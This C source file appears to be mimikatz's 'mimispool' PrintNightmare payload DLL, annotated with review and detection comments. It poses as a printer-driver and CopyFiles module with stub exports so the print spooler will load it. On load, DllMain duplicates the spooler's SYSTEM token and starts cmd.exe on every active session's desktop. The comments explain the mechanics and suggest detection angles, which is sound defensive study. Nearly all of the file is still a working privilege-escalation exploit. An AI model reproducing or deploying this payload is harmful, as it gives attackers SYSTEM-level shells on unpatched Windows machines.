/* Benjamin DELPY `gentilkiwi`
https://blog.gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "mimispool.h"
// DLL entry point.
// The payload is not behind a separate export: on DLL_PROCESS_ATTACH the
// function immediately calls RunProcessForAll(L"cmd.exe"), so merely loading
// this image into a process triggers it. Every other fdwReason is ignored and
// the function always reports success to the loader.
// NOTE(review): RunProcessForAll performs token, environment and process
// creation calls while the loader lock is held here. For detection purposes
// the tell-tale is process creation originating from inside a DLL load,
// which is unusual for a legitimate printer-driver module.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    UNREFERENCED_PARAMETER(hinstDLL);
    UNREFERENCED_PARAMETER(lpReserved);
    if (fdwReason == DLL_PROCESS_ATTACH)
    {
        // Fires once per process load; return value is deliberately ignored.
        RunProcessForAll(L"cmd.exe");
    }
    return TRUE;
}
// PrintNightMare 2.x - via config file and/or "real driver"
// Printer-driver export, intentionally a no-op.
// Presumably present only so the DLL exposes the symbol set expected of a
// driver module; it has no side effects.
VOID APIENTRY DrvResetConfigCache()
{
    ;
}
// Printer-driver export.
// For dwMode == DRVQUERY_USERMODE it answers "user-mode driver": *pcbNeeded is
// always set to sizeof(DWORD), and when pBuffer is non-NULL and cbBuf is large
// enough a TRUE is stored in it and the call succeeds. Any other dwMode fails
// with ERROR_INVALID_PARAMETER.
// NOTE(review): SetLastError(ERROR_INSUFFICIENT_BUFFER) sits outside the inner
// if, so it also runs on the success path; a caller that inspects
// GetLastError() after a TRUE return sees a stale error code.
// NOTE(review): pcbNeeded is dereferenced without a NULL check.
BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBuf, PDWORD pcbNeeded)
{
    BOOL status = FALSE;
    if (dwMode == DRVQUERY_USERMODE)
    {
        // Required size is reported regardless of whether a buffer was given.
        *pcbNeeded = sizeof(DWORD);
        if (pBuffer && (cbBuf >= sizeof(DWORD)))
        {
            status = TRUE;
            *(DWORD*)pBuffer = TRUE;
        }
        // Executed even when status is TRUE (see note above).
        SetLastError(ERROR_INSUFFICIENT_BUFFER);
    }
    else
    {
        SetLastError(ERROR_INVALID_PARAMETER);
    }
    return status;
}
// Printer-driver export.
// Rejects an engine version below 0x20000 or a DRVENABLEDATA smaller than
// 0x10 bytes with ERROR_BAD_DRIVER_LEVEL. Otherwise it fills pded with
// version 0x20000 and an EMPTY function table (pdrvfn = NULL, c = 0): the
// "driver" implements no rendering entry points at all, it only needs to be
// accepted and loaded.
// NOTE(review): pded is written without a NULL check.
BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded)
{
    BOOL status = FALSE;
    if ((iEngineVersion < 0x20000) || (cj < 0x10))
    {
        SetLastError(ERROR_BAD_DRIVER_LEVEL);
    }
    else
    {
        // Zero DDI functions: nothing for the graphics engine to call.
        pded->iDriverVersion = 0x20000;
        pded->pdrvfn = NULL;
        pded->c = 0;
        status = TRUE;
    }
    return status;
}
// Printer-driver export, intentionally a no-op (counterpart of
// DrvEnableDriver, which allocates nothing that would need releasing).
VOID APIENTRY DrvDisableDriver()
{
    ;
}
// PrintNightMare 3.x - via "real packaged driver" - NOT included (need WHQL signature - or pre-approved Authenticode)
// PrintNightMare 4.x - via CopyFiles
// CopyFiles hook export.
// Every parameter is ignored and ERROR_SUCCESS is returned, so the caller
// proceeds as if source/target paths had been produced. The export exists so
// that the DLL gets loaded to resolve it; the actual behaviour lives in
// DllMain, which runs at load time.
DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDirectory, LPBYTE pSplClientInfo, DWORD dwLevel, LPWSTR pszSourceDir, LPDWORD pcchSourceDirSize, LPWSTR pszTargetDir, LPDWORD pcchTargetDirSize, DWORD dwFlags)
{
    UNREFERENCED_PARAMETER(pszPrinterName);
    UNREFERENCED_PARAMETER(pszDirectory);
    UNREFERENCED_PARAMETER(pSplClientInfo);
    UNREFERENCED_PARAMETER(dwLevel);
    UNREFERENCED_PARAMETER(pszSourceDir);
    UNREFERENCED_PARAMETER(pcchSourceDirSize);
    UNREFERENCED_PARAMETER(pszTargetDir);
    UNREFERENCED_PARAMETER(pcchTargetDirSize);
    UNREFERENCED_PARAMETER(dwFlags);
    return ERROR_SUCCESS;
}
// CopyFiles event export.
// Ignores the printer name, key and event type and unconditionally reports
// success; like GenerateCopyFilePaths it is a placeholder whose only role is
// to make the DLL loadable as a CopyFiles module.
BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, DWORD dwCopyFileEvent)
{
    UNREFERENCED_PARAMETER(pszPrinterName);
    UNREFERENCED_PARAMETER(pszKey);
    UNREFERENCED_PARAMETER(dwCopyFileEvent);
    return TRUE;
}
// Kiwi payload - SYSTEM on all active desktop(s)
// Payload: start szProcess once in every active session, on the interactive
// desktop ("winsta0\\default"), using a primary token duplicated from the
// current process. The spawned processes therefore carry the hosting
// process's identity (SYSTEM when hosted by the spooler, as the comment
// above states).
//
// Flow — each step is nested in the previous one, so a failure at any step
// silently skips everything below it:
//   1. open this process's token and duplicate it as a primary token;
//   2. build an environment block for that token;
//   3. enumerate sessions via WinStationEnumerateW (winsta, undocumented);
//   4. for every State_Active session, retarget the token's session id and
//      CreateProcessAsUser with a new console; both returned handles are
//      closed at once, so nothing tracks or waits on the children.
// All acquired handles/buffers are released on the way out; sessions is
// freed only if the enumeration returned a non-NULL buffer.
//
// NOTE(review): status is initialised FALSE and never updated, so the
// function always returns FALSE no matter how many processes it started.
// DllMain discards the result, so this is harmless here but misleading to
// any other caller.
// NOTE(review): changing TokenSessionId normally needs SeTcbPrivilege —
// presumably held by the hosting process; confirm if reusing elsewhere.
// Detection angle: a service process issuing CreateProcessAsUser for the
// same image across multiple sessions in quick succession, shortly after a
// driver DLL load.
BOOL RunProcessForAll(LPWSTR szProcess)
{
    BOOL status = FALSE;
    STARTUPINFO si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    HANDLE hToken, hNewToken;
    DWORD i, count;
    LPVOID Environment;
    PSESSIONIDW sessions;
    si.cb = sizeof(si);
    // Interactive desktop so the new console is visible in each session.
    si.lpDesktop = L"winsta0\\default";
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
    {
        // Primary token is required by CreateProcessAsUser.
        if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hNewToken))
        {
            if (CreateEnvironmentBlock(&Environment, hNewToken, FALSE))
            {
                if (WinStationEnumerateW(SERVERHANDLE_CURRENT, &sessions, &count)) // cmd as SYSTEM for everyone
                {
                    for (i = 0; i < count; i++)
                    {
                        // Only sessions with a logged-on, active desktop.
                        if (sessions[i].State == State_Active)
                        {
                            // Same duplicated token is re-pointed at each session in turn.
                            if (SetTokenInformation(hNewToken, TokenSessionId, &sessions[i].SessionId, sizeof(sessions[i].SessionId)))
                            {
                                if (CreateProcessAsUser(hNewToken, szProcess, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT, Environment, NULL, &si, &pi))
                                {
                                    // Fire-and-forget: handles dropped immediately.
                                    CloseHandle(pi.hThread);
                                    CloseHandle(pi.hProcess);
                                }
                            }
                        }
                    }
                    if (sessions)
                    {
                        WinStationFreeMemory(sessions);
                    }
                }
                DestroyEnvironmentBlock(Environment);
            }
            CloseHandle(hNewToken);
        }
        CloseHandle(hToken);
    }
    // Always FALSE (see note above).
    return status;
}